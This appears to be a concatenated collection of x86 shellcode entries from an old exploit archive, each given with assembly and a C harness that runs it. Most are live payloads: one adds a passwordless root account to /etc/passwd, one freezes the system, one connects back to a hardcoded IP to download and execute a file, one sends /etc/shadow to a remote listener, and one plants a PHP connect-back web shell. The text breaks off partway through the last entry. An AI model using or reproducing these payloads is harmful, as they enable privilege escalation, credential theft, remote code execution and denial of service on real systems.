//
// PEB way of getting kernel32 imagebase by loco.
// Compatible with all Win9x/NT based operating systems.
//
// Gives kernel32 imagebase in eax when executing.
// 29 bytes, only eax/esi used.
//
// Originally discovered by Dino Dai Zovi.
//
//

#include <stdio.h>

/*
    xor   eax, eax
    add   eax, fs:[eax+30h]
    js    method_9x

method_nt:
    mov   eax, [eax + 0ch]
    mov   esi, [eax + 1ch]
    lodsd
    mov   eax, [eax + 08h]
    jmp   kernel32_ptr_found

method_9x:
    mov   eax, [eax + 34h]
    lea   eax, [eax + 7ch]
    mov   eax, [eax + 3ch]
kernel32_ptr_found:
*/

unsigned char Shellcode[] =
    "\x33\xC0"          // xor eax, eax
    "\x64\x03\x40\x30"  // add eax, dword ptr fs:[eax+30]
    "\x78\x0C"          // js short $+12
    "\x8B\x40\x0C"      // mov eax, dword ptr [eax+0C]
    "\x8B\x70\x1C"      // mov esi, dword ptr [eax+1C]
    "\xAD"              // lodsd
    "\x8B\x40\x08"      // mov eax, dword ptr [eax+08]
    "\xEB\x09"          // jmp short $+9
    "\x8B\x40\x34"      // mov eax, dword ptr [eax+34]
    "\x8D\x40\x7C"      // lea eax, dword ptr [eax+7C]
    "\x8B\x40\x3C"      // mov eax, dword ptr [eax+3C]
; // = 29 bytes.

int main()
{
    printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1);
    return 1;
}

/*
*  Linux/x86
*
*  Appends the line "z::0:0:::\n" to /etc/passwd.
*  (quite old, could be optimized further)
*/
#include <stdio.h>

char c0de[] =
/* main: */
"\xeb\x29"                           /* jmp callz                */
/* start: */
"\x5e"                               /* popl %esi                */
"\x29\xc0"                           /* subl %eax, %eax          */
"\x88\x46\x0b"                       /* movb %al, 0x0b(%esi)     */
"\x89\xf3"                           /* movl %esi, %ebx          */
"\x66\xb9\x01\x04"                   /* movw $0x401, %cx         */
"\x66\xba\xb6\x01"                   /* movw $0x1b6, %dx         */
"\xb0\x05"                           /* movb $0x05, %al          */
"\xcd\x80"                           /* int $0x80                */
"\x93"                               /* xchgl %eax, %ebx         */
"\x29\xc0"                           /* subl %eax, %eax          */
"\x29\xd2"                           /* subl %edx, %edx          */
"\xb0\x04"                           /* movb $0x04, %al          */
"\x89\xf1"                           /* movl %esi, %ecx          */
"\x80\xc1\x0c"                       /* addb $0x0c, %cl          */
"\xb2\x0a"                           /* movb $0x0a, %dl          */
"\xcd\x80"                           /* int $0x80                */
"\x29\xc0"                           /* subl %eax, %eax          */
"\x40"                               /* incl %eax                */
"\xcd\x80"                           /* int $0x80                */
/* callz: */
"\xe8\xd2\xff\xff\xff"               /* call start               */
/* DATA */
"/etc/passwd"
"\xff"
"z::0:0:::\n";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%d\n",strlen(c0de));
        (*ret) = (int)c0de;
}

    [ dun[at]strcpy.pl ]
  
[ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ]

############################################################
###
   iopl(3); asm("cli"); while(1){}
   // * this code cause freezeing system
############################################################
#####

__asm__(
    "xorl %eax, %eax\n"
    "pushl $0x3\n"
    "popl %ebx\n"
    "movb $0x6e,%al\n"
    "int $0x80\n"
    "cli\n"
    "x1:\n"
    "jmp x1\n"
);

*/


char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe";

int main() {

    void (*sc)();
    sc = (void *)&shellcode;
    sc();
    
return 0;
}

// milw0rm.com [2008-09-17]

/*
By Thomas Rinsma <me[at]th0mas.nl> (16 apr. 2008)

Shellcode makes system speaker beep once, 45 bytes:


  ;     int fd = open("/dev/tty10", O_RDONLY);
   push byte 5
   pop eax
   cdq
   push edx
   push 0x30317974
   push 0x742f2f2f
   push 0x7665642f
   mov ebx, esp
   mov ecx, edx
   int 80h

  ;     ioctl(fd, KDMKTONE (19248), 66729180);
   mov ebx, eax
   push byte 54
   pop eax
   mov ecx, 4294948047
   not ecx
   mov edx, 66729180
   int 80h
*/


main()
{
   char shellcode[] =
       "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74"
       "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36"
       "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80";

   (*(void (*)()) shellcode)();
}

/*
;file download shellcode (149 bytes)
;
;connect back, download a file and execute.  
;modify the name of the file and the ip address first.
;
;militan
;Advanced Defense Lab(ADL)
;



global _start

_start:

xor ecx,ecx
mul ecx
xor ebx,ebx
cdq

;socket
push eax
push byte 0x1
push byte 0x2
mov ecx,esp
inc ebx
mov al,0x66
int 0x80
mov edi,eax            ;edi=sockfd


;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23)  
push edx
push long 0x2335738c    ;address *
push word 0x0f27       ;port    *
mov dl,0x02
push dx                ;family  1
mov ecx,esp             ;adjust struct
push byte 0x10
push ecx  
push edi               ;sockfd
mov ecx,esp            
mov bl,3                
mov al,102
int 0x80

;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700)
xor ebx,ebx
xor ecx,ecx
push ecx
push word 0x6263       ;file name="cb"
mov ebx,esp
mov cx,0x242            
mov dx,0x1c0           ;Octal
mov al,5
int 0x80
mov esi,eax            ;esi=fd


;
xor ecx,ecx
mul ecx
cdq
mov dx,0x03e8        ;memory chunk=1000=0x03e8: read per time      
    
L1:                        
;sys_read(socket sockfd,buf,len)            
xor ebx,ebx
xor eax,eax
mov al,3
mov ebx,edi           ;edi=sock fd
lea ecx,[esp-1000]     ;memory chunk
int 0x80
;sys_write(fd,*buf,count)
mov ebx,esi              
mov edx,eax              
xor eax,eax
mov al,4
int 0x80
cmp dx,0x03e8          
je L1                 ;loop


CONTINUE:
;sys_close(fd)
mov ebx,esi            
xor eax,eax
mov al,6
int 0x80

;execve[./cb,0]      
xor ecx,ecx
mul ecx
push ecx
push word 0x6263      ;file name="cb"
mov ebx,esp
push ecx
push ebx                  
mov ecx,esp              
mov al,0x0b
int 0x80


EXIT:
xor eax,eax
xor ebx,ebx
inc eax
int 0x80
*/

#include<stdio.h>
#include<string.h>
#include<stdlib.h>


unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80"
"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80"

"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80"
"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
"\x31\xc0\x31\xdb\x40\xcd\x80";

void k(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
}

int main (){
  k();
  return 0;
}

;                           (C)oDed by 0in
;                   Dark-Coders Group Productions
;        [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
;   >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
;               Contact: 0in[dot]email[at]gmail[dot]com
;           Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
;       nasm -f elf shellcode.asm
;       ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::

;The code (Assembler version):

Section .text
    global _start

_start:
         ;open(file,O_RDONLY):
        xor ebx,ebx
        push byte 0x77;/etc/shadow
        push word 0x6f64
        push 0x6168732f
        push 0x6374652f; ----------
        mov ebx,esp; first arg - filename
        xor ax,ax
        inc ax
        inc ax
        inc ax
        inc ax
        inc ax; ax = 5 (O_RDONLY)
        int 0x80
        mov ebx,eax
       ;read(file,buff,1222):
        xor ax,ax
        inc ax
        inc ax
        inc ax; syscall id = 3
        mov dx,1222; size to read
        push esp
        mov ecx,[esp]; memory
        int 0x80
        mov esi,eax; file to ESI
       ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP)
        xor ebx,ebx
        push ebx;0; 3rd arg
        inc ebx
        push ebx;1; 2nd arg
        inc ebx
        push ebx;2; 1st arg
                   ;socketcall()
        mov ax,1666;--------------
        sub ax,1564;--------------
        xor bx,bx  ; socket() call id
        inc bx     ;- - - - - - - - -
        mov ecx,esp; socket()
        int 0x80   ; do it!
        pop ebx; clear mem
       ;connect(eax,struct server,16)
                 ;16 - sizeof struct sockaddr
        mov edx, eax
        xor ebx,ebx
        xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP)
        push ebx
        mov bx,1666; definition of struct sockaddr
        sub bx,1634;we cant stay 0x00 here (8192 PORT)
        push bx
        mov al, 2;
        push ax
        mov ecx, esp
        mov al, 16
        push eax
        push ecx
        push edx
        mov al, 102
        mov bx,1666
        sub bx,1663;---------------------------------
        mov ecx, esp
        int 0x80; call connect
        mov ebx,eax; socket to ebx
       ; Ok! so...
       ; Lets write file to server and go down!
       ;write(socket,file,1222)
        pop ebx
        mov ax,1666
        sub ax,1662
        push esi
        mov dx,16666
        sub dx,15444
        int 0x80
       ;exit(1) :
        xor eax,eax;----------
        inc eax
        mov ebx,eax;----------
        int 0x80   ; do it!
;C:
;   #include <stdio.h>
;   char shellcode[]="\x31\xdb"
;   "\x6a\x77"
;   "\x66\x68\x64\x6f"
;   "\x68\x2f\x73\x68\x61"
;   "\x68\x2f\x65\x74\x63"
;   "\x89\xe3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\xba\xc6\x04"
;   "\x54"
;   "\x8b\x0c\x24"
;   "\xcd\x80"
;   "\x89\xc6"
;   "\x31\xdb"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x1c\x06"
;   "\x66\x31\xdb"
;   "\x66\x43"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x5b"
;   "\x89\xc2"
;   "\x31\xdb"
;   "\x53"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x62\x06"
;   "\x66\x53"
;   "\xb0\x02"
;   "\x66\x50"
;   "\x89\xe1"
;   "\xb0\x10"
;   "\x50"
;   "\x51"
;   "\x52"
;   "\xb0\x66"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x7f\x06"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x5b"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x7e\x06"
;   "\x56"
;   "\x66\xba\x1a\x41"
;   "\x66\x81\xea\x54\x3c"
;   "\xcd\x80"
;   "\x31\xc0"
;   "\x40"
;   "\x89\xc3"
;   "\xcd\x80";
;   int main(int argc, char **argv)
;    {
;        int *ret;
;        ret = (int *)&ret + 2;
;        (*ret) = (int) shellcode;
;    }

#include <stdlib.h>

        /* Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode
         *
         *      Function:
         *              Opens /var/www/cb.php and writes a php connectback shell to the filesystem.
         *
         *      Shellcode Size: 508 bytes (No Encodings)
         *
         *      PHP Shell Usage:
         *              // victim
         *              http://vulnhost.com/cb.php?host=192.168.1.1?port=777
         *
         *              // attacker
         *              nc -l -p 777
         *
         *      greets: #c-, #hhp, #oldskewl, d-town, sd2600, dc214, everyone else.
     *      
     *      
         *      ~roonr
         */


    // shellcode
        char sc[] = "\x68\x70\x68\x70\xff\x68\x2f\x63\x62\x2e\x68\x2f\x77\x77\x77\x68"
             "\x2f\x76\x61\x72\x31\xc0\x89\xe6\x88\x46\x0f\x89\xe3\x31\xc9\xb1"
             "\x42\x31\xd2\xb2\xff\x31\xc0\xb0\x05\xcd\x80\x31\xdb\x88\xc3\x68"
             "\x3f\x3e\xff\xff\x68\x3b\x7d\x20\x7d\x68\x24\x72\x29\x29\x68\x6c"
             "\x65\x6e\x28\x68\x20\x73\x74\x72\x68\x20\x24\x72\x2c\x68\x6f\x63"
             "\x6b\x2c\x68\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74"
             "\x5f\x68\x3b\x73\x6f\x63\x68\x31\x24\x20\x22\x68\x73\x75\x31\x2e"
             "\x68\x5c\x6e\x63\x62\x68\x2e\x3d\x20\x22\x68\x60\x3b\x24\x72\x68"
             "\x20\x60\x24\x69\x68\x24\x72\x20\x3d\x68\x30\x29\x29\x7b\x68\x2c"
             "\x20\x31\x30\x68\x73\x6f\x63\x6b\x68\x61\x64\x28\x24\x68\x74\x5f"
             "\x72\x65\x68\x6f\x63\x6b\x65\x68\x24\x69\x3d\x73\x68\x69\x6c\x65"
             "\x28\x68\x29\x3b\x77\x68\x68\x22\x2c\x31\x30\x68\x74\x65\x64\x3a"
             "\x68\x6e\x6e\x65\x63\x68\x20\x22\x43\x6f\x68\x6f\x63\x6b\x2c\x68"
             "\x65\x28\x24\x73\x68\x77\x72\x69\x74\x68\x6b\x65\x74\x5f\x68\x3b"
             "\x73\x6f\x63\x68\x6f\x72\x74\x29\x68\x2c\x20\x24\x70\x68\x72\x65"
             "\x73\x73\x68\x24\x61\x64\x64\x68\x63\x6b\x2c\x20\x68\x28\x24\x73"
             "\x6f\x68\x6e\x65\x63\x74\x68\x5f\x63\x6f\x6e\x68\x63\x6b\x65\x74"
             "\x68\x29\x3b\x73\x6f\x68\x5f\x54\x43\x50\x68\x2c\x53\x4f\x4c\x68"
             "\x52\x45\x41\x4d\x68\x4b\x5f\x53\x54\x68\x2c\x53\x4f\x43\x68\x49"
             "\x4e\x45\x54\x68\x28\x41\x46\x5f\x68\x65\x61\x74\x65\x68\x74\x5f"
             "\x63\x72\x68\x6f\x63\x6b\x65\x68\x63\x6b\x3d\x73\x68\x3b\x24\x73"
             "\x6f\x68\x72\x74\x27\x5d\x68\x5b\x27\x70\x6f\x68\x5f\x47\x45\x54"
             "\x68\x72\x74\x3d\x24\x68\x3b\x24\x70\x6f\x68\x74\x27\x5d\x29\x68"
             "\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x65\x28\x24\x5f\x68\x79"
             "\x6e\x61\x6d\x68\x6f\x73\x74\x62\x68\x67\x65\x74\x68\x68\x65\x73"
             "\x73\x3d\x68\x61\x64\x64\x72\x68\x73\x65\x7b\x24\x68\x3b\x7d\x65"
             "\x6c\x68\x34\x2e\x22\x29\x68\x72\x20\x34\x30\x68\x45\x72\x72\x6f"
             "\x68\x6e\x74\x28\x22\x68\x7b\x70\x72\x69\x68\x74\x27\x5d\x29\x68"
             "\x27\x70\x6f\x72\x68\x47\x45\x54\x5b\x68\x26\x21\x24\x5f\x68\x74"
             "\x27\x5d\x26\x68\x27\x68\x6f\x73\x68\x47\x45\x54\x5b\x68\x28\x21"
             "\x24\x5f\x68\x50\x20\x69\x66\x68\x3c\x3f\x50\x48\x31\xc0\x89\xe6"
             "\xb0\x04\x89\xe1\x66\xba\x62\x01\xcd\x80";

    
int main(){
    

    // run shellcode
        asm("JMP %0;" : "=m" (sc));

    /*
        asm volatile(
            "cb_shellcode:\n"
            "push $0xff706870;"
            "push $0x2e62632f;"
            "push $0x7777772f;"
            "push $0x7261762f;"
            "xor %eax, %eax;"
            "mov %esp, %esi;"
            "movb %al, 0xf(%esi);"
          
            // sys_open
            "mov %esp, %ebx; "
                    "xor %ecx, %ecx;"
                "movb $0x42, %cl;"
                "xor %edx, %edx;"
                "movb $0xff, %dl;"
                "xor %eax, %eax;"
                 "movb $0x05, %al;"
            "int $0x80;"
            
            // sys_write